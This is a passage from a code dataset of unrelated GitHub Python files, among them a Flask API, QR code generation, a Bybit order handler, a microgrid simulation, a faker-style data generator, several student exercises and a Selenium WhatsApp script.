data.append(self.sryp_id.value)\n data.append(self.session_id)\n data.append(self.transaction_id)\n data.append(self.type.value)\n \n if (self.has_xyz_timer):\n self.xyz_timer.encode(data)\n if (self.has_pqvl):\n self.encode_pqvl(data)\n\n def encode_pqvl(self, data):\n data.append(YEW.YewAlwaysOnSession.value << 4 | (self.pvql & 0x01))\n\nclass ByteBuffer:\n def __init__(self):\n self.buffer = []\n self.current = 0\n\n def getAvailable(self):\n return len(self.buffer) - self.current\n\n def read(self):\n value = self.buffer[self.current]\n self.current += 1\n return value\n\n def append(self, i):\n self.buffer.append(i)","repo_name":"emilybache/Encode-TestDesign-Kata","sub_path":"python/encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"56"} +{"seq_id":"16758066509","text":"from flask import *\nimport config, json, traceback, requests, sys\nsys.path.insert(0, '.')\nfrom runner import returnJSON\n\n#setup the flask blueprint\nmain = Blueprint('main', __name__)\n\n#our api endpoint route. users have parameter(s): origin, destination, one -> four\n@main.route('/api', methods=['GET'])\ndef main_route():\n if request.method == 'GET':\n origin = request.args.get('origin'); destination = request.args.get('destination')\n one = request.args.get('one'); two = request.args.get('two')\n three = request.args.get('three'); four = request.args.get('four')\n return returnJSON(origin, destination)\n\n#ensure that the response headers are set to return application/json.\n@main.after_request\ndef apply_json(response):\n response.headers['content-type'] = 'application/json'\n return response","repo_name":"abrowne2/Carby","sub_path":"carby/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"75005703533","text":"from mplogger import *\r\nimport logging, logging.config\r\nfrom worker import Worker\r\nfrom time import sleep\r\n\r\nif __name__ == '__main__':\r\n #Start the listener\r\n logQueue = Queue()\r\n print('Main logQueue {}'.format(logQueue))\r\n listener = LogListener(logQueue)\r\n listener.start()\r\n config = sender_config\r\n config['handlers']['queue']['queue'] = logQueue\r\n logging.config.dictConfig(config)\r\n logger = logging.getLogger('application')\r\n \r\n logger.info('Starting subprocesses')\r\n \r\n procs = []\r\n for i in range(5):\r\n p = Worker('SP{}'.format(i),config)\r\n procs.append(p)\r\n p.start()\r\n \r\n #Let the subprocesses run for 10 seconds, then tell them to stop\r\n sleep(10)\r\n for p in procs:\r\n p.stop()\r\n p.join()\r\n \r\n logger.info('Subprocesses stopped')\r\n listener.stop()\r\n ","repo_name":"Golgothen/MultiprocessLogging","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"16996771795","text":"import sys\nrl = sys.stdin.readline\n\n\ndef find_ables(_x):\n if _x != ables[_x]:\n ables[_x] = find_ables(ables[_x])\n return ables[_x]\n\n\ndef simulate(_cnt):\n for i in range(_cnt):\n n = int(rl())\n able = find_ables(n)\n if able == 0:\n return i\n else:\n ables[able] = find_ables(able - 1)\n return _cnt\n\n\nG, P = int(rl()), int(rl())\nables = [i for i in range(G + 1)]\n\nprint(simulate(P))\n","repo_name":"doggydeok2/Problem-Solving","sub_path":"BOJ/10775 공항.py","file_name":"10775 공항.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"2651590978","text":"'''\nAuthor: Javad Torkzadehmahani\nStudent ID: 982164624\nInstructor: Prof. Ghafouri\nCourse: Advanced Programming (Python)\nGoal: working with nested loop\n'''\n\ndef factorial(X):\n fact = 1\n for counter in range (1 , X + 1):\n fact = fact * counter\n return fact\n\nsum = 0\nN = int(input(\"Enter N: \"))\nfor counter in range (2 , 2 * N + 1 , 2):\n sum = factorial(counter) + sum\n\nprint(\"fact(2) + ... + fact(2N) is: \", sum)","repo_name":"javad-torkzadeh/courses","sub_path":"python_course/ch4_NL_exercise3.py","file_name":"ch4_NL_exercise3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"13813027611","text":"\r\nfrom google.cloud import language\r\n\r\n\r\nlanguage_client = language.Client()\r\n\r\ntext = 'i hate this and its bad'\r\ndocument = language_client.document_from_text(text)\r\n\r\nsentiment = document.analyze_sentiment()\r\n\r\nprint('Text: {}'.format(text))\r\nprint('Sentiment: {}, {}'.format(sentiment.score, sentiment.magnitude))","repo_name":"kavyaprathyusha/sentimental-analysis","sub_path":"sent.py","file_name":"sent.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12465843464","text":"# -*- coding:utf-8 -*-\nimport os,os.path\nimport shutil\nimport hashlib\n\ndef _get_qr_url(appId,app_apk_url,logo_url=''):\n directory = 'static/qrdata/{f1}/{f2}/'.format(f1=appId/100000,f2=(appId%100000)/2000)\n qr_path = os.path.join(app.config['ROOT_PATH'],directory)\n if not os.path.exists(qr_path):\n os.makedirs(qr_path)\n\n md5File = '%s.png' % hashlib.md5(app_apk_url).hexdigest()\n qr_file = '%s%s' % (qr_path,md5File)\n qr_url = directory + md5File\n if os.path.exists(qr_file):\n return qr_url\n else:\n import qrcode\n from PIL import Image\n\n qr = qrcode.QRCode(\n version=2,\n error_correction=qrcode.constants.ERROR_CORRECT_H,\n box_size=8,\n border=2\n )\n qr.add_data(app_apk_url)\n qr.make(fit=True)\n img = qr.make_image()\n img = img.convert(\"RGBA\")\n\n logo_file = _get_apk_logo(appId,logo_url)\n if logo_file and os.path.exists(logo_file):\n icon = Image.open(logo_file)\n img_w, img_h = img.size\n factor = 4\n size_w = int(img_w / factor)\n size_h = int(img_h / factor)\n\n icon_w, icon_h = icon.size\n if icon_w > size_w:\n icon_w = size_w\n if icon_h > size_h:\n icon_h = size_h\n icon = icon.resize((icon_w, icon_h), Image.ANTIALIAS)\n\n w = int((img_w - icon_w) / 2)\n h = int((img_h - icon_h) / 2)\n icon = icon.convert(\"RGBA\")\n img.paste(icon, (w, h), icon)\n\n img.save(qr_file)\n return qr_url","repo_name":"randy-ran/randy-ran.github.io","sub_path":"qrcode_demo/qr_demo.py","file_name":"qr_demo.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12316820084","text":"\nfrom src.sharedstate import SharedState\n\n\nclass BybitOrderHandler:\n\n\n def __init__(self, sharedstate: SharedState) -> None:\n self.ss = sharedstate\n\n \n def sync(self, recv: dict) -> None:\n\n data = recv[\"result\"][\"list\"]\n\n self.ss.current_orders = {\n o[\"orderId\"]: {\"price\": float(o[\"price\"]), \"qty\": float(o[\"qty\"]), \"side\": o[\"side\"]} \n for o in data\n }\n\n def process(self, data: dict) -> None:\n\n new_orders = {\n order[\"orderId\"]: {\"price\": order[\"price\"], \"qty\": order[\"qty\"], \"side\": order[\"side\"]}\n for order in data\n if order.get(\"orderStatus\") == \"New\"\n }\n\n filled_orders = set(\n order[\"orderId\"] \n for order in data \n if order[\"orderStatus\"] == \"Filled\"\n )\n\n # Update the orders\n self.ss.current_orders.update(new_orders)\n\n # Remove filled orders\n for order_id in filled_orders:\n self.ss.current_orders.pop(order_id, None)\n","repo_name":"beatzxbt/bybit-smm","sub_path":"src/exchanges/bybit/websockets/handlers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"56"} +{"seq_id":"11806898239","text":"import sys\nfrom itertools import chain\nfrom typing import Optional\n\nimport numpy as np\nimport yaml\nfrom more_itertools import collapse\n\nfrom openmodelica_microgrid_gym.aux_ctl import PLL, PLLParams, dq0_to_abc, inst_power, inst_reactive, DDS, DroopParams, \\\n DroopController, InverseDroopController, InverseDroopParams\n\n\nclass Network:\n def __init__(self, ts, v_nom, freq_nom=50):\n self.ts = ts\n self.v_nom = v_nom\n self.freq_nom = freq_nom\n\n @classmethod\n def load(cls, configurl='net.yaml'):\n \"\"\"\n Initialize object from config file\n\n :param configurl:\n :return:\n \"\"\"\n data = yaml.safe_load(open(configurl))\n components = data['components']\n del data['components']\n self = cls(**data)\n\n components_obj = []\n for name, component in components.items():\n # resolve class from 'cls' argument\n comp_cls = component['cls']\n del component['cls']\n comp_cls = getattr(sys.modules[__name__], comp_cls)\n\n # rename keys (because 'in' is a reserved keyword)\n if 'in' in component:\n component['in_vars'] = component.pop('in')\n if 'out' in component:\n component['out_vars'] = component.pop('out')\n\n # instanciate component class\n try:\n components_obj.append(comp_cls(net=self, **component))\n except AttributeError as e:\n raise AttributeError(f'{e!s}, please validate {configurl}')\n self.components = components_obj\n\n return self\n\n def reset(self):\n for comp in self.components:\n comp.reset()\n\n def params(self, actions):\n \"\"\"\n Allows the network to add additional parameters like changing loads to the simulation\n\n :param actions:\n :return: mapping of additional actions and list of actions.\n \"\"\"\n d = {}\n for comp in self.components:\n params = comp.params(actions)\n d.update(params)\n return d\n\n def augment(self, state: np.ndarray, normalize=True) -> np.ndarray:\n \"\"\"\n Allows the network to provide additional output variables in order to provide measurements and reference\n information the RL agent needs to understand its rewards\n :param state:\n :return:\n \"\"\"\n return np.hstack([comp.augment(state, normalize) for comp in self.components])\n\n def in_vars(self):\n return list(collapse([comp.get_in_vars() for comp in self.components]))\n\n def out_vars(self, with_aug=True, flattened=True):\n r = [comp.get_out_vars(with_aug) for comp in self.components]\n if flattened:\n return list(collapse(r))\n return r\n\n @property\n def components(self):\n return self._components\n\n @components.setter\n def components(self, val):\n self._components = val\n keys = self.out_vars(with_aug=False, flattened=True)\n for comp in self.components:\n comp.set_outidx(keys)\n\n\nclass Component:\n def __init__(self, net: Network, id=None, in_vars=None, out_vars=None, out_calc=None):\n \"\"\"\n\n :param net:\n :param id:\n :param in_vars:\n :param out_vars:\n :param out_calc: mapping from attr name to\n \"\"\"\n self.net = net\n self.id = id\n for attr in chain.from_iterable((f.keys() for f in filter(None, (in_vars, out_vars)))):\n if not hasattr(self, attr):\n raise AttributeError(f'{self.__class__} no such attribute: {attr}')\n self.in_vars = in_vars\n self.in_idx = None # type: Optional[dict]\n\n self.out_calc = out_calc or {}\n self.out_vars = out_vars\n self.out_idx = None # type: Optional[dict]\n\n def reset(self):\n pass\n\n def params(self, actions):\n \"\"\"\n Calculate additional environment parameters\n :param actions:\n :return: mapping\n \"\"\"\n return {}\n\n def get_in_vars(self):\n \"\"\"\n list of input variable names of this component\n \"\"\"\n if self.in_vars:\n return [[self._prefix_var(val) for val in vals] for attr, vals in self.in_vars.items()]\n return []\n\n def get_out_vars(self, with_aug=False):\n r = []\n if self.out_vars:\n r = [[self._prefix_var(val) for val in vals] for attr, vals in self.out_vars.items()]\n\n if not with_aug:\n return r\n else:\n return r + [[self._prefix_var([attr, str(i)]) for i in range(n)] for attr, n in self.out_calc.items()]\n\n def fill_tmpl(self, state):\n if self.out_idx is None:\n raise ValueError('call set_tmplidx before fill_tmpl. the keys must be converted to indices for efficiency')\n for attr, idxs in self.out_idx.items():\n # set object variables to the respective state variables\n if hasattr(self, attr):\n setattr(self, attr, state[idxs])\n else:\n raise AttributeError(f'{self.__class__} has no such attribute: {attr}')\n\n def set_outidx(self, keys):\n # this is mainly for performance reasons\n keyidx = {v: i for i, v in enumerate(keys)}\n self.out_idx = {}\n try:\n for var, keys in self.out_vars.items():\n # lookup index in the whole state keys\n self.out_idx[var] = [keyidx[self._prefix_var(key)] for key in keys]\n except KeyError as e:\n raise KeyError(f'the output variable {e!s} is not provided by your state keys')\n\n def _prefix_var(self, strs):\n if isinstance(strs, str):\n strs = [strs]\n if self.id is not None and strs[0].startswith('.'):\n # this is a complete identifier like 'lc1.inductor1.i' that should not be modified:\n # first string minus its prefix '.' and the remaining strs\n strs = [self.id] + [strs[0][1:]] + strs[1:]\n return '.'.join(strs)\n\n def calculate(self):\n \"\"\"\n will write internal variables it is called after all internal variables are set\n The return value must be a dictionary whose keys match the keys of self.out_calc and whose values are of the length of outcalcs values\n\n set(self.out_calc.keys()) == set(return)\n all([len(v) == self.out_calc[k] for k,v in return.items()])\n :return:\n \"\"\"\n return dict(iref=[.1, 22, 4], vref=[])\n\n def normalize(self, calc_data):\n pass\n\n def augment(self, state, normalize=True):\n self.fill_tmpl(state)\n calc_data = self.calculate()\n\n if normalize:\n self.normalize(calc_data)\n attr = ''\n try:\n new_vals = []\n for attr, n in self.out_calc.items():\n for i in range(n):\n new_vals.append(calc_data[attr][i])\n return np.hstack([getattr(self, attr) for attr in self.out_idx.keys()] + new_vals)\n except KeyError as e:\n raise ValueError(\n f'{self.__class__} missing return key: {e!s}. did you forget to set it in the calculate method?')\n except IndexError as e:\n raise ValueError(f'{self.__class__}.calculate()[{attr}] has the wrong number of values')\n\n\nclass Inverter(Component):\n def __init__(self, u=None, i=None, v=None, i_nom=20, i_lim=30, v_lim=600, v_DC=1000, i_ref=(0, 0, 0), **kwargs):\n self.u = u\n self.v = v\n self.i = i\n self.i_nom = i_nom\n self.i_lim = i_lim\n self.v_lim = v_lim\n self.v_DC = v_DC\n self.i_ref = i_ref\n super().__init__(**{'out_calc': dict(i_ref=3), **kwargs})\n\n def normalize(self, calc_data):\n self.i /= self.i_lim\n self.v /= self.v_lim\n calc_data['i_ref'] /= self.i_lim\n\n def params(self, actions):\n return {**super().params(actions), **{self._prefix_var(['.v_DC']): self.v_DC}}\n\n\nclass SlaveInverter(Inverter):\n def __init__(self, pll=None, pdroop=None, qdroop=None, **kwargs):\n super().__init__(**kwargs)\n\n pdroop = {**dict(gain=40000.0), **(pdroop or {})}\n qdroop = {**dict(gain=50.0), **(qdroop or {})}\n pll = {**dict(kP=10, kI=200), **(pll or {})}\n\n self.pdroop_ctl = InverseDroopController(\n InverseDroopParams(tau=self.net.ts, nom_value=self.net.freq_nom, **pdroop), self.net.ts)\n self.qdroop_ctl = InverseDroopController(\n InverseDroopParams(tau=self.net.ts, nom_value=self.net.v_nom, **qdroop), self.net.ts)\n # default pll params and new ones\n self.pll = PLL(PLLParams(f_nom=self.net.freq_nom, **pll), self.net.ts)\n\n def reset(self):\n self.pdroop_ctl.reset()\n self.qdroop_ctl.reset()\n self.pll.reset()\n\n def calculate(self):\n _, _, phase = self.pll.step(self.v)\n return dict(i_ref=dq0_to_abc(self.i_ref, phase))\n\n\nclass MasterInverter(Inverter):\n def __init__(self, v_ref=(1, 0, 0), pdroop=None, qdroop=None, **kwargs):\n self.v_ref = v_ref\n super().__init__(out_calc=dict(i_ref=3, v_ref=3), **kwargs)\n pdroop = {**(pdroop or {}), **dict(gain=40000.0, tau=.005)}\n qdroop = {**(qdroop or {}), **dict(gain=1000.0, tau=.002)}\n\n self.pdroop_ctl = DroopController(DroopParams(nom_value=self.net.freq_nom, **pdroop), self.net.ts)\n self.qdroop_ctl = DroopController(DroopParams(nom_value=self.net.v_nom, **qdroop), self.net.ts)\n self.dds = DDS(self.net.ts)\n\n def reset(self):\n self.pdroop_ctl.reset()\n self.qdroop_ctl.reset()\n self.dds.reset()\n\n def calculate(self):\n instPow = -inst_power(self.v, self.i)\n freq = self.pdroop_ctl.step(instPow)\n # Get the next phase rotation angle to implement\n phase = self.dds.step(freq)\n\n instQ = -inst_reactive(self.v, self.i)\n v_refd = self.qdroop_ctl.step(instQ)\n v_refdq0 = np.array([v_refd, 0, 0]) * self.v_ref\n\n return dict(i_ref=dq0_to_abc(self.i_ref, phase), v_ref=dq0_to_abc(v_refdq0, phase))\n\n def normalize(self, calc_data):\n super().normalize(calc_data),\n calc_data['v_ref'] /= self.v_lim\n\n\nclass Load(Component):\n def __init__(self, i=None, **kwargs):\n self.i = i\n super().__init__(**kwargs)\n\n def params(self, actions):\n # TODO: perhaps provide modelparams that set resistance value\n return super().params(actions)\n","repo_name":"00mjk/openmodelica-microgrid-gym","sub_path":"openmodelica_microgrid_gym/net/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":10467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"56"} +{"seq_id":"3299369738","text":"states = int(input(\"How many states are there?\"))\n\ni = 1\n\nstatesarray = []\nmainarray = []\nsidearray = []\n\nwhile i < states + 1:\n statesarray.append(i)\n i += 1\n\nh = 0\nf = 0\n\nwhile h < len(statesarray):\n while f < len(statesarray):\n probability = input(\"Probability of transitioning from\" + str(statesarray[h]) + \"to\" + str(statesarray[f]))\n sidearray.append(probability)\n if len(sidearray) == len(statesarray):\n mainarray.append(sidearray)\n sidearray.clear()\n f += 1\nh += 1\n\n# categorized such that probability of state 1 transitioning to stage 4 is mainarray[0][3]\n# probability of transitioning from state m to state n is mainarray[m-1][n-1]\n\nresult = 1\n\n# we want to calculate the probability of n state transitions\n\ntransitions = int(input(\"Enter the number of transitions involved:\"))\n\ni = 0\n\nwhile i < transitions:\n firststate = int(input(\"Enter the state you're transitioning from:\"))\n secondstate = int(input(\"Enter the state you're transitioning to:\"))\n result *= mainarray[firststate - 1][secondstate - 1]\ni += 1\n\nprint(result)\n","repo_name":"ShizhongHu/Markov-Chain-Simulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"6237054179","text":"#################################\n# TEMPLATE CLASS\n# Handles user input and the main game loop.\n################################\nfrom game.word_manager import WordManager \nfrom game.graphic_manager import GraphicManager\nfrom game.terminal_service import TerminalService\n\nclass Director:\n\n \"\"\"\n This class is working to call start_game, get_word_masked, get_word, and get_guessed_left. \n\n Sterotypes: Structurer, Coordinator, Controller\n \n Args:\n start_game:Starts the game and calls get_word, update_word, and get_word_masked\n get_word_masked:Gets the word the user will guess on\n get_word:matches the correct word from get_word_masked\n get_guessed_left:Gives the user the remaining guesses\n\n \n \"\"\"\n\n #Initialize necessary classes and attributes\n def __init__(self):\n \"\"\"The class constructor\n Args:\n self.WordManager: an instance for word_Manager\n self.GraphicManager: an instance for graphic_manager\n \"\"\"\n self._graphic = GraphicManager() \n self._is_playing = True \n self._words= WordManager() \n self._terminal_service = TerminalService() \n self._guess = ''\n \n \n\n #TEMPLATE FUNCTION\n #contains game loop--order of play\n def start_game(self):\n \"\"\"The class Information Holder\n Args:\n self (Director): an instance of Director\n\n \"\"\"\n \n #display hypthens \n\n\n while self._is_playing: \n self.get_inputs() \n self.do_updates() \n self.do_outputs() \n\n def get_inputs(self): \n \"\"\" gets the masked word from word manager\n\n Args: \n self (Director): an instance of Director\n \"\"\"\n self._words.print_guessedWord() #display gueessed word from word manager \n\n self._graphic.print_parachute() #display graphic\n #ask for letter guess \n self._guess = (self._terminal_service.read_text(\"\\nGuess a letter [A-Z]: \")).lower()\n \n\n def do_updates(self): \n \"\"\"Updates letter found in word or removes portion of parachute \n\n Args: \n self (Director): An instance of Director.\n \"\"\" \n # Heidi you can also give feedback to the user with the wrong() and right() methods from terminal_service \n # (check_letter return true if guess is in the word false in other case)\n\n #looks for letter in word and updates letter in word\n self._words.check_letter(self._guess)\n if self._words.check_letter(self._guess) == True:\n self._terminal_service.right()\n else:\n self._terminal_service.wrong()\n #removes portion of parachute -> Use decrease_lives() from graphic_manager\n self._graphic.decrease_lives()\n\n\n def do_outputs(self): \n \"\"\"Determines game won or lost. Continues play or ends game. \n \n Args: \n self (Director): An instance of Director. \n \"\"\" \n\n #if word is solved - winner\n\n if self._words.user_wins() == True: \n self._is_playing = False \n # print(\"You Won\") #Diego pls Change this line for the method you_win()\n self._words.print_guessedWord() \n self._graphic.print_parachute()\n self._terminal_service.you_win()\n exit()\n\n #if parachute removed - game over \n if self._graphic.get_lives() <= 0: \n # print(\"Game Over\") #Diego pls Change this line for the method game_over()\n self._words.print_guessedWord() \n self._graphic.print_parachute()\n self._terminal_service.game_over()\n exit()\n ","repo_name":"diamonddan/cse-210-Jumper","sub_path":"Jumper/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20070623969","text":"import boto3\n\necs = boto3.client('ecs')\nresponse = ecs.create_capacity_provider(\n name='capacity-to-serverless-cluster',\n autoScalingGroupProvider={\n 'autoScalingGroupArn': 'arn:aws:ecs:eu-west-3:111866276431:cluster/Fargate-cluster-ecs-stoic',\n 'managedScaling': {\n 'status': 'ENABLED',\n },\n 'managedTerminationProtection': 'DISABLED'\n },\n tags=[\n {\n 'key': 'env',\n 'value': 'test'\n },\n ]\n)","repo_name":"lusien88/py-test","sub_path":"configure-capacity-fargate-cluster-ecs.py","file_name":"configure-capacity-fargate-cluster-ecs.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36577405469","text":"# compatibility with faker.rb yaml file interpolation\nimport os\nimport yaml\nimport random\nimport re\nimport hashlib\n\nfrom .debug import debug, verbose\nfrom .helpers import LAMBDA_TYPE, readfile, exit_error\n\n# a key looks like: base.field\n# base maps to faker/lib/locales/en/base.yaml\n# field maps into that file. fields can be defined\n# recursively\n\nLOCALE = \"en\"\n\nfrom os import environ as ENV\nif \"LOCALE\" in ENV:\n LOCALE = ENV[\"LOCALE\"]\n\nDEFAULT_LOCALE = \"en\"\n\nOPENED_DATA = {}\nCACHE_DIR = os.path.expanduser(\"~/.cache/plait.py/\")\nDIRTY_CACHE = False\n\nSCRIPT_PATH = os.path.realpath(__file__)\nFAKER_DIR = os.path.realpath(os.path.join(__file__, \"..\", \"..\", \"vendor/faker/\"))\nLOCALE_DIR = \"lib/locales/\"\n\nif not os.path.exists(CACHE_DIR):\n try:\n os.makedirs(CACHE_DIR)\n except:\n debug(\"Can't create cache for fakerb data in\", CACHE_DIR)\n pass\n\nFAKERB_PICKLE = \"%s/fakerb.pickle\" % CACHE_DIR\n\ndef setup_data(filename, doc, data):\n global DIRTY_CACHE\n OPENED_DATA[filename] = doc\n data = str(data).encode(\"utf-8\")\n OPENED_DATA[filename][\"md5\"] = hashlib.md5(data).hexdigest()\n\n DIRTY_CACHE=True\n\ndef list_namespaces():\n files = os.listdir(os.path.join(FAKER_DIR, LOCALE_DIR, DEFAULT_LOCALE))\n\n for f in sorted(files):\n if f.find(\"yml\") != -1:\n yield f.replace(\".yml\", \"\")\n\ndef parse_key(fullkey, basename=None):\n if not OPENED_CACHE:\n open_cache()\n\n if type(fullkey) != str:\n return fullkey\n\n tokens = fullkey.split()\n plan = []\n\n start_i = 0\n end_i = -1\n\n def make_fetcher(group, basename):\n return lambda: fetch(group, basename)\n\n while True:\n start_i = fullkey.find(\"#{\", start_i);\n\n if start_i == -1:\n break\n else:\n if end_i+1 < start_i:\n plan.append(fullkey[end_i+1:start_i])\n\n end_i = fullkey.find(\"}\", start_i)\n\n if end_i == -1:\n break\n\n group = fullkey[start_i+2:end_i]\n\n plan.append(make_fetcher(group, basename))\n\n\n start_i = end_i\n\n if start_i == -1 and end_i == 0:\n plan.append(fullkey)\n\n return plan\n\n\n# decode turns a string into its matching value,\n# but it is slow to continually reparse the same string\n# so if we can come up with an execution plan (of lambdas),\n# we are better off\nPLANS={}\ndef decode(fullkey,basename=None):\n if type(fullkey) != str:\n return fullkey\n\n if fullkey.find(\"#{\") == -1:\n return fullkey\n\n if fullkey in PLANS:\n plan = PLANS[fullkey]\n else:\n verbose(\"BUILDING FETCH PLAN FOR FAKER KEY\", fullkey)\n plan = parse_key(fullkey, basename)\n PLANS[fullkey] = plan\n\n ret = [ x() if type(x) == LAMBDA_TYPE else x for x in plan]\n\n return \"\".join(ret)\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle as pickle\n\nOPENED_CACHE=False\ndef open_cache():\n global OPENED_DATA, DIRTY_CACHE,OPENED_CACHE\n try:\n with open(FAKERB_PICKLE) as f:\n loaded = pickle.load(f)\n OPENED_DATA = loaded\n except Exception as e:\n debug(e)\n\n expired = []\n for file in OPENED_DATA:\n\n if not os.path.exists(file):\n expired.append(file)\n verbose(\"EXPIRING NON EXISTENT FILE\", file)\n continue\n\n with readfile(file) as f:\n data = f.read()\n\n h = hashlib.md5(data)\n d = h.hexdigest()\n\n if not \"md5\" in OPENED_DATA[file] or d != OPENED_DATA[file][\"md5\"]:\n verbose(\"EXPIRING CACHED FILE\", file)\n expired.append(file)\n continue\n\n for file in expired:\n del OPENED_DATA[file]\n\n\n DIRTY_CACHE = False\n OPENED_CACHE = True\n\n open_locale(LOCALE)\n\n\ndef save_cache():\n global DIRTY_CACHE\n if DIRTY_CACHE:\n with open(FAKERB_PICKLE, \"wb\") as f:\n pickle.dump(OPENED_DATA, f)\n\n DIRTY_CACHE = False\n\n\nLOCALE_DATA = {}\ndef open_locale(locale):\n global LOCALE\n LOCALE = locale\n fname = \"%s/%s/%s.yml\" % (FAKER_DIR, LOCALE_DIR, locale)\n\n if not fname in OPENED_DATA:\n verbose(\"READING LOCALE FROM FILE\")\n with readfile(fname) as f:\n data = f.read().encode(\"utf-8\")\n\n\n d = hashlib.md5(data).hexdigest()\n\n doc = yaml.load(data)\n setup_data(fname, doc[LOCALE][\"faker\"], data)\n\n LOCALE_DATA.clear()\n LOCALE_DATA.update(OPENED_DATA[fname])\n\n\ndef fetch(key, fallback_base, lookup=False):\n tokens = key.split(\".\")\n if len(tokens) > 1:\n basename = tokens[0].lower()\n tokens.pop(0)\n else:\n if lookup:\n basename = key\n tokens.pop()\n else:\n basename = fallback_base\n\n fields = None\n if basename in LOCALE_DATA:\n fields = LOCALE_DATA[basename]\n if tokens[0] not in fields:\n fields = None\n\n if not fields:\n dirname = \"%s/lib/locales/%s/\" % (FAKER_DIR, DEFAULT_LOCALE)\n filename = \"%s/%s.yml\" % (dirname, basename)\n if not filename in OPENED_DATA:\n verbose(\"OPENING FAKER FILE\", filename)\n\n with readfile(filename) as f:\n data = f.read()\n\n doc = yaml.load(data)\n setup_data(filename, doc, data)\n else:\n doc = OPENED_DATA[filename]\n fields = doc[DEFAULT_LOCALE][\"faker\"][basename]\n\n for field in tokens:\n fields = fields[field]\n\n if lookup:\n return fields\n\n if type(fields) == list:\n fields = random.choice(fields)\n\n\n # replace \"#\" character with random numbers\n if type(fields) == str:\n fields = decode(fields,basename)\n\n def replace_wildnum(match):\n return str(random.randint(0, 9))\n\n if fields.find(\"#\") != -1:\n fields = re.sub(\"#\", replace_wildnum, fields)\n\n\n\n return fields\n\nif __name__ == \"__main__\":\n decode(\"name.last_name\")\n","repo_name":"plaitpy/plaitpy","sub_path":"src/fakerb.py","file_name":"fakerb.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"56"} +{"seq_id":"35933524445","text":"\"\"\"\nThis module includes function which will help the user\\\nto find needed information zbout Twitter user in json file.\n\"\"\"\nimport json\nfrom colored import fg, attr\n\n\ndef read_json_return_data(path):\n \"\"\"\n This function reads json file and returns data from it.\n \"\"\"\n with open(path, \"r\", encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef find_in_json(data, previous_data):\n \"\"\"\n This function gives an opportunity to the user to find needed information in json file.\n \"\"\"\n print('%sChoose the type of information you want to see \\nor make one step back entering \"back\":%s' % (\n fg(99), attr(0)))\n print(list(data.keys()))\n key = input()\n if key == 'back':\n return find_in_json(previous_data[-2], previous_data[:-1])\n elif key == '':\n return None\n else:\n if isinstance(data[key], list):\n print(f'%sHere are several blocks of information.\\nChoose block from 1 to {len(data[key])}:%s' % (\n fg(99), attr(0)))\n index = int(input()) - 1\n previous_data.append(data[key][index])\n return find_in_json(data[key][index], previous_data)\n if isinstance(data[key], dict):\n previous_data.append(data[key])\n return find_in_json(data[key], previous_data)\n return f'%s{data[key]}%s' % (fg(99), attr(0))\n\n\nif __name__ == \"__main__\":\n print('%sPlease enter the path to json file:%s' % (fg(99), attr(0)))\n path_to_json = input()\n data_from_json = read_json_return_data(path_to_json)\n print(find_in_json(data_from_json, [data_from_json]))\n\n","repo_name":"hooloobooroodkoo/Task2_Navigate_Json","sub_path":"json_navigation.py","file_name":"json_navigation.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74227199854","text":"# from datetime import time\r\nfrom os import get_inheritable\r\nimport time\r\nimport unittest\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.common import by\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport pandas as pd\r\n\r\nCHROME_PROFILE_PATH = \"user-data-dir=C:\\\\Users\\\\osnas\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\"\r\n\r\nclass HomePageTests(unittest.TestCase):\r\n\r\n def setUp(self) -> None:\r\n \r\n # self.driver = webdriver.Chrome(executable_path=r'./chromedriver.exe')\r\n pathChromeDriver = 'C:/Users/osnas/Documents/scripts_python/wpsender/chromedriver.exe'\r\n s = Service(pathChromeDriver)\r\n \r\n options = webdriver.ChromeOptions()\r\n options.add_argument(CHROME_PROFILE_PATH)\r\n self.driver = webdriver.Chrome(service=s,options=options)\r\n driver = self.driver\r\n driver.get(\"https://web.whatsapp.com/\")\r\n driver.maximize_window()\r\n 